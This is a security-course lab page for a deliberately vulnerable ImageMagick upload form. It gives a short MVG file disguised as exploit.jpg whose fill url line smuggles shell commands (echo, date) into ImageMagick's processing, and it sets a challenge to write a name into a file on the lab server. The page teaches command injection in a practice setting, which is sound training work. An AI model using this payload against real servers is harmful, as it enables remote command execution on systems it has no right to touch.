Vulnerable ImageMagick Page

Normal Usage

  1. Get a normal GIF or JPEG image
  2. Upload it using the buttons below
  3. Click the thumbnail to see your image
Select image to upload:

Vulnerability

Make a text file with these contents:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|echo "HELLO";date;")'
pop graphic-context
Save it as exploit.jpg. Upload it using the form above on this page.

The "echo" and "date" commands execute, as shown below.


Challenge: Add Your Name to the Hall of Fame

Put your name in this file:

/tmp/im/winners
After one minute, your name will appear on the WINNERS page here:

http://attack3214.samsclass.info/root/im-winners.html

Hint

Step-by-step instructions

Sources

http://www.w3schools.com/php/php_file_upload.asp


Posted 5-4-16 by Sam Bowne
Revised 2-15-17